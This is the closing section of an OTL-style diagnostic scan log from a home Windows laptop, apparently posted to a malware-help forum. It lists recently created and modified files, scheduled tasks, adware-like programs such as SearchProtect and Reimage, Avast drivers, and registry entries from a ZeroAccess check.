[2014/05/04 16:44:30 | 000,000,000 | ---D | C] -- C:\Program Files (x86)\SuperFastPC
[2014/05/04 16:43:37 | 000,000,000 | ---D | C] -- C:\Program Files (x86)\SearchProtect
[2014/05/04 16:36:02 | 000,000,000 | ---D | C] -- C:\ProgramData\Synaptics
[2014/05/04 16:35:57 | 000,000,000 | R--D | C] -- C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Shopping and Services
[2014/05/04 16:32:39 | 000,000,000 | ---D | C] -- C:\Windows\SoftwareDistribution
========== Files - Modified Within 30 Days ==========
[2014/06/02 13:23:00 | 000,000,830 | ---- | M] () -- C:\Windows\tasks\Adobe Flash Player Updater.job
[2014/06/02 13:20:00 | 000,000,902 | ---- | M] () -- C:\Windows\tasks\GoogleUpdateTaskMachineUA.job
[2014/06/02 12:45:56 | 000,067,584 | --S- | M] () -- C:\Windows\bootstat.dat
[2014/06/02 09:20:04 | 000,002,210 | ---- | M] () -- C:\Users\Public\Desktop\Google Chrome.lnk
[2014/06/02 09:20:02 | 000,000,898 | ---- | M] () -- C:\Windows\tasks\GoogleUpdateTaskMachineCore.job
[2014/06/02 07:46:12 | 000,000,354 | ---- | M] () -- C:\Windows\tasks\HPCeeScheduleForpaulj_000.job
[2014/06/02 07:45:58 | 268,435,456 | -HS- | M] () -- C:\swapfile.sys
[2014/06/02 07:45:54 | 3349,221,376 | -HS- | M] () -- C:\hiberfil.sys
[2014/06/01 22:19:09 | 000,007,456 | ---- | M] () -- C:\Windows\SysNative\SettingsFile
[2014/06/01 21:49:02 | 000,001,170 | ---- | M] () -- C:\Users\Public\Desktop\Mozilla Firefox.lnk
[2014/05/31 22:30:46 | 000,000,338 | ---- | M] () -- C:\Windows\tasks\HPCeeScheduleForSarah.job
[2014/05/29 22:12:02 | 000,243,371 | ---- | M] () -- C:\Windows\SysNative\ScanResults.xml
[2014/05/22 17:14:44 | 000,956,476 | ---- | M] () -- C:\Windows\SysNative\PerfStringBackup.INI
[2014/05/22 17:14:44 | 000,800,408 | ---- | M] () -- C:\Windows\SysNative\perfh009.dat
[2014/05/22 17:14:44 | 000,165,436 | ---- | M] () -- C:\Windows\SysNative\perfc009.dat
[2014/05/21 16:42:53 | 000,335,896 | ---- | M] () -- C:\Windows\SysNative\FNTCACHE.DAT
[2014/05/19 21:41:53 | 000,002,252 | -H-- | M] () -- C:\Users\paulj_000\Documents\Default.rdp
[2014/05/19 16:58:07 | 001,039,096 | ---- | M] (AVAST Software) -- C:\Windows\SysNative\drivers\aswsnx.sys
[2014/05/19 16:58:06 | 000,423,240 | ---- | M] (AVAST Software) -- C:\Windows\SysNative\drivers\aswsp.sys
[2014/05/19 16:58:06 | 000,085,328 | ---- | M] (AVAST Software) -- C:\Windows\SysNative\drivers\aswstm.sys
[2014/05/10 08:40:36 | 000,000,870 | ---- | M] () -- C:\Users\paulj_000\Desktop\µTorrent.lnk
[2014/05/06 14:02:58 | 000,000,426 | ---- | M] () -- C:\AVScanner.ini
[2014/05/06 13:53:48 | 000,000,000 | -H-- | M] () -- C:\Windows\SysNative\drivers\Msft_User_LocationProvider_01_11_00.Wdf
[2014/05/05 19:34:54 | 000,000,536 | ---- | M] () -- C:\Windows\SysWow64\schtasks.bin
[2014/05/04 17:34:28 | 000,001,093 | ---- | M] () -- C:\Users\Public\Desktop\VLC media player.lnk
[2014/05/04 16:58:36 | 000,001,989 | ---- | M] () -- C:\Users\Public\Desktop\avast! Free Antivirus.lnk
[2014/05/04 16:54:22 | 001,039,096 | ---- | M] (AVAST Software) -- C:\Windows\SysNative\drivers\aswsnx.sys.1400515085015
[2014/05/04 16:54:22 | 000,423,240 | ---- | M] (AVAST Software) -- C:\Windows\SysNative\drivers\aswsp.sys.1400515085015
[2014/05/04 16:54:22 | 000,334,648 | ---- | M] (AVAST Software) -- C:\Windows\SysNative\aswBoot.exe
[2014/05/04 16:54:22 | 000,208,416 | ---- | M] () -- C:\Windows\SysNative\drivers\aswVmm.sys
[2014/05/04 16:54:22 | 000,079,184 | ---- | M] (AVAST Software) -- C:\Windows\SysNative\drivers\aswMonFlt.sys
[2014/05/04 16:54:22 | 000,065,776 | ---- | M] () -- C:\Windows\SysNative\drivers\aswRvrt.sys
[2014/05/04 16:54:22 | 000,029,208 | ---- | M] () -- C:\Windows\SysNative\drivers\aswHwid.sys
[2014/05/04 16:54:20 | 000,093,568 | ---- | M] (AVAST Software) -- C:\Windows\SysNative\drivers\aswRdr2.sys
[2014/05/04 16:54:16 | 000,043,152 | ---- | M] (AVAST Software) -- C:\Windows\avastSS.scr
[2014/05/04 16:53:28 | 000,000,163 | ---- | M] () -- C:\Windows\Reimage.ini
[2014/05/04 16:51:05 | 000,001,924 | ---- | M] () -- C:\Users\Public\Desktop\PC Scan & Repair by Reimage.lnk
[2014/05/04 16:36:04 | 000,002,155 | ---- | M] () -- C:\Users\Public\Desktop\WildTangent Games for HP.lnk
========== Files Created - No Company Name ==========
[2014/06/01 21:49:02 | 000,001,170 | ---- | C] () -- C:\Users\Public\Desktop\Mozilla Firefox.lnk
[2014/06/01 21:49:01 | 000,001,182 | ---- | C] () -- C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Mozilla Firefox.lnk
[2014/06/01 19:37:07 | 000,000,354 | ---- | C] () -- C:\Windows\tasks\HPCeeScheduleForpaulj_000.job
[2014/06/01 09:02:38 | 000,000,426 | ---- | C] () -- C:\AVScanner.ini
[2014/05/25 20:07:25 | 000,243,371 | ---- | C] () -- C:\Windows\SysNative\ScanResults.xml
[2014/05/25 19:55:28 | 000,007,456 | ---- | C] () -- C:\Windows\SysNative\SettingsFile
[2014/05/19 18:23:52 | 000,002,252 | -H-- | C] () -- C:\Users\paulj_000\Documents\Default.rdp
[2014/05/18 09:12:56 | 000,387,210 | ---- | C] () -- C:\Windows\SysNative\ApnDatabase.xml
[2014/05/18 09:02:52 | 000,139,600 | ---- | C] () -- C:\Windows\SysNative\systemsf.ebd
[2014/05/18 08:58:08 | 000,262,335 | ---- | C] () -- C:\Windows\SysNative\dfpinc.dat
[2014/05/18 08:54:14 | 000,002,255 | ---- | C] () -- C:\Windows\SysWow64\WimBootCompress.ini
[2014/05/18 08:54:14 | 000,002,255 | ---- | C] () -- C:\Windows\SysNative\WimBootCompress.ini
[2014/05/18 08:52:45 | 000,100,197 | ---- | C] () -- C:\Windows\SysWow64\RacRules.xml
[2014/05/18 08:52:45 | 000,100,197 | ---- | C] () -- C:\Windows\SysNative\RacRules.xml
[2014/05/18 08:52:43 | 000,007,762 | ---- | C] () -- C:\Windows\SysWow64\connectedsearch-suggestions.searchconnector-ms
[2014/05/18 08:52:43 | 000,007,762 | ---- | C] () -- C:\Windows\SysNative\connectedsearch-suggestions.searchconnector-ms
[2014/05/18 08:52:43 | 000,007,130 | ---- | C] () -- C:\Windows\SysWow64\connectedsearch-zeroinput.searchconnector-ms
[2014/05/18 08:52:43 | 000,007,130 | ---- | C] () -- C:\Windows\SysNative\connectedsearch-zeroinput.searchconnector-ms
[2014/05/18 08:52:14 | 000,011,109 | ---- | C] () -- C:\Windows\SysWow64\connectedsearch-results.searchconnector-ms
[2014/05/18 08:52:14 | 000,011,109 | ---- | C] () -- C:\Windows\SysNative\connectedsearch-results.searchconnector-ms
[2014/05/18 08:52:08 | 000,050,053 | ---- | C] () -- C:\Windows\SysNative\srms.dat
[2014/05/18 08:52:02 | 000,002,440 | R-S- | C] () -- C:\ProgramData\Microsoft\Windows\Start Menu\Programs\FileManager.lnk
[2014/05/10 08:40:36 | 000,000,870 | ---- | C] () -- C:\Users\paulj_000\Desktop\µTorrent.lnk
[2014/05/09 20:04:10 | 000,000,338 | ---- | C] () -- C:\Windows\tasks\HPCeeScheduleForSarah.job
[2014/05/06 17:12:48 | 000,138,240 | ---- | C] () -- C:\Windows\SysNative\OEMLicense.dll
[2014/05/06 17:12:48 | 000,103,936 | ---- | C] () -- C:\Windows\SysWow64\OEMLicense.dll
[2014/05/06 13:56:03 | 000,001,453 | ---- | C] () -- C:\Users\paulj_000\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Internet Explorer.lnk
[2014/05/06 13:53:48 | 000,000,000 | -H-- | C] () -- C:\Windows\SysNative\drivers\Msft_User_LocationProvider_01_11_00.Wdf
[2014/05/05 10:46:46 | 000,000,830 | ---- | C] () -- C:\Windows\tasks\Adobe Flash Player Updater.job
[2014/05/05 08:29:09 | 000,000,536 | ---- | C] () -- C:\Windows\SysWow64\schtasks.bin
[2014/05/04 17:34:28 | 000,001,093 | ---- | C] () -- C:\Users\Public\Desktop\VLC media player.lnk
[2014/05/04 16:58:36 | 000,001,989 | ---- | C] () -- C:\Users\Public\Desktop\avast! Free Antivirus.lnk
[2014/05/04 16:57:12 | 000,002,210 | ---- | C] () -- C:\Users\Public\Desktop\Google Chrome.lnk
[2014/05/04 16:56:12 | 000,000,902 | ---- | C] () -- C:\Windows\tasks\GoogleUpdateTaskMachineUA.job
[2014/05/04 16:56:11 | 000,000,898 | ---- | C] () -- C:\Windows\tasks\GoogleUpdateTaskMachineCore.job
[2014/05/04 16:55:37 | 000,208,416 | ---- | C] () -- C:\Windows\SysNative\drivers\aswVmm.sys
[2014/05/04 16:55:36 | 000,065,776 | ---- | C] () -- C:\Windows\SysNative\drivers\aswRvrt.sys
[2014/05/04 16:55:36 | 000,029,208 | ---- | C] () -- C:\Windows\SysNative\drivers\aswHwid.sys
[2014/05/04 16:51:05 | 000,001,924 | ---- | C] () -- C:\Users\Public\Desktop\PC Scan & Repair by Reimage.lnk
[2014/05/04 16:49:19 | 000,000,163 | ---- | C] () -- C:\Windows\Reimage.ini
[2014/05/04 16:36:03 | 000,002,155 | ---- | C] () -- C:\Users\Public\Desktop\WildTangent Games for HP.lnk
[2014/05/04 16:35:57 | 000,002,242 | ---- | C] () -- C:\Users\Public\Desktop\Visit eBay.co.uk.lnk
[2014/05/04 16:35:57 | 000,002,241 | ---- | C] () -- C:\Users\Public\Desktop\Snapfish Photos.lnk
[2013/10/25 20:49:08 | 000,303,104 | ---- | C] () -- C:\Windows\SysWow64\igdmd32.dll
[2013/10/25 20:49:04 | 000,180,736 | ---- | C] () -- C:\Windows\SysWow64\igdde32.dll
[2013/10/25 20:49:04 | 000,142,848 | ---- | C] () -- C:\Windows\SysWow64\igdail32.dll
[2013/08/26 07:13:37 | 000,931,872 | ---- | C] () -- C:\Windows\SysWow64\PerfStringBackup.INI
[2013/08/22 16:36:43 | 000,215,943 | ---- | C] () -- C:\Windows\SysWow64\dssec.dat
[2013/08/22 16:36:42 | 000,000,741 | ---- | C] () -- C:\Windows\SysWow64\NOISE.DAT
[2013/08/22 15:46:23 | 000,067,584 | --S- | C] () -- C:\Windows\bootstat.dat
[2013/08/22 08:01:23 | 000,043,131 | ---- | C] () -- C:\Windows\mib.bin
[2013/08/22 04:32:36 | 000,046,080 | ---- | C] () -- C:\Windows\SysWow64\BWContextHandler.dll
[2013/08/22 00:55:20 | 000,364,544 | ---- | C] () -- C:\Windows\SysWow64\msjetoledb40.dll
[2013/08/22 00:52:39 | 000,673,088 | ---- | C] () -- C:\Windows\SysWow64\mlang.dat
[2013/07/01 20:44:46 | 000,001,536 | ---- | C] () -- C:\Windows\SysWow64\IusEventLog.dll
========== ZeroAccess Check ==========
[2013/11/12 19:34:14 | 000,000,227 | RHS- | M] () -- C:\Windows\assembly\Desktop.ini
[HKEY_CURRENT_USER\Software\Classes\clsid\{42aedc87-2188-41fd-b9a3-0c966feabec1}\InProcServer32] /64
[HKEY_CURRENT_USER\Software\Classes\Wow6432node\clsid\{42aedc87-2188-41fd-b9a3-0c966feabec1}\InProcServer32]
[HKEY_CURRENT_USER\Software\Classes\clsid\{fbeb8a05-beee-4442-804e-409d6c4515e9}\InProcServer32] /64
[HKEY_CURRENT_USER\Software\Classes\Wow6432node\clsid\{fbeb8a05-beee-4442-804e-409d6c4515e9}\InProcServer32]
[HKEY_LOCAL_MACHINE\Software\Classes\clsid\{42aedc87-2188-41fd-b9a3-0c966feabec1}\InProcServer32] /64
"" = C:\Windows\SysNative\shell32.dll -- [2014/03/27 10:12:37 | 021,225,584 | ---- | M] (Microsoft Corporation)
"ThreadingModel" = Apartment
[HKEY_LOCAL_MACHINE\Software\Wow6432Node\Classes\clsid\{42aedc87-2188-41fd-b9a3-0c966feabec1}\InProcServer32]
"" = %SystemRoot%\system32\shell32.dll -- [2014/03/27 08:48:28 | 018,679,728 | ---- | M] (Microsoft Corporation)
"ThreadingModel" = Apartment
[HKEY_LOCAL_MACHINE\Software\Classes\clsid\{5839FCA9-774D-42A1-ACDA-D6A79037F57F}\InProcServer32] /64
"" = C:\Windows\SysNative\wbem\fastprox.dll -- [2013/08/22 10:49:49 | 000,921,088 | ---- | M] (Microsoft Corporation)
"ThreadingModel" = Free
[HKEY_LOCAL_MACHINE\Software\Wow6432Node\Classes\clsid\{5839FCA9-774D-42A1-ACDA-D6A79037F57F}\InProcServer32]
"" = %systemroot%\system32\wbem\fastprox.dll -- [2013/08/22 03:45:10 | 000,691,712 | ---- | M] (Microsoft Corporation)
"ThreadingModel" = Free
[HKEY_LOCAL_MACHINE\Software\Classes\clsid\{F3130CDB-AA52-4C3A-AB32-85FFC23AF9C1}\InProcServer32] /64
"" = C:\Windows\SysNative\wbem\wbemess.dll -- [2013/08/22 10:45:17 | 000,483,840 | ---- | M] (Microsoft Corporation)
"ThreadingModel" = Both
[HKEY_LOCAL_MACHINE\Software\Wow6432Node\Classes\clsid\{F3130CDB-AA52-4C3A-AB32-85FFC23AF9C1}\InProcServer32]
========== LOP Check ==========
[2014/05/06 13:59:42 | 000,000,000 | ---D | M] -- C:\Users\paulj_000\AppData\Roaming\AVAST Software
[2014/06/02 14:03:15 | 000,000,000 | ---D | M] -- C:\Users\paulj_000\AppData\Roaming\ClassicShell
[2014/05/10 08:40:59 | 000,000,000 | ---D | M] -- C:\Users\paulj_000\AppData\Roaming\Search Protection
[2014/05/06 13:56:14 | 000,000,000 | ---D | M] -- C:\Users\paulj_000\AppData\Roaming\Synaptics
[2014/05/31 16:02:46 | 000,000,000 | ---D | M] -- C:\Users\paulj_000\AppData\Roaming\uTorrent
========== Purity Check ==========
========== Alternate Data Streams ==========
@Alternate Data Stream - 220 bytes -> C:\Users\paulj_000\SkyDrive:ms-properties
< End of report >
Edited by peejaygee, 02 June 2014 - 09:08 AM.